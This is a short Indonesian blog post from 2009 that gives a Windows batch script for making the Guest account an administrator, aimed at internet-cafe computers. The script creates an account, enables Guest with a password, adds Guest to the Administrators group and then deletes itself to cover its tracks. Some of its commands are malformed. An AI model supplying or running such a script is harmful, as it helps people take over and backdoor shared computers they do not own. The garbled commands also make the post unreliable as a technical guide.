Sabtu, 28 Februari 2009

Ubah dari Guest jadi Administrator

okey yang perlu Anda siapkan adalah
1. Notepad
2. Account yg setara dengan Administrator

ingat yah,, Anda harus ada account yang setara dengan Administrator,, kalau gak ada ya gak bisa deh,, dan biasanya k'lo di warnet2 sih rata2 accountnya setara dengan Administrator..
maksud setara dengan Administrator adalah Account itu berada di satu localgroup yang sama, yaitu Administrator.. hohohohoho

okey, udah nyiapin notepad kan?? nih masukin script ini ke notepad

Code:

echo off
title Please wait...
cls
net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add

del %0

setelah itu simpan itu dalam bentuk .bat
okey tinggal di klik 2 kali aja itu program,,
selamat mencoba

semoga bermanfaat
__________________

1 komentar: